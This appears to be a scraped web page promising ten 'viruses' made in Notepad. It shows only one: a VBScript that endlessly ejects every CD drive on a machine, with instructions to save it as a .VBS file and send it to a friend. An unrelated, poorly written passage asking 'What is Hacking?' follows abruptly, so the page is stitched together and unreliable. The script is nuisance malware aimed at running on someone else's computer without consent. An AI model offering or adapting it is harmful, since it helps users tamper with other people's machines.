10 Easy ways to make Viruses from Notepad

10 virus notepad script


Open Notepad and Type these Commands:-


1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

What is Hacking ?


This is the most common question of every internet user. And perhaps you will be suffered with this problem. About 3 years ago, when I was new to internet and only used it for surfing facebook, orkut, social networks or something like this. That time, some of my friend says that he can hack my account, first time I heard about this "Hacking". After that I always thought about Hacking or What is Hacking?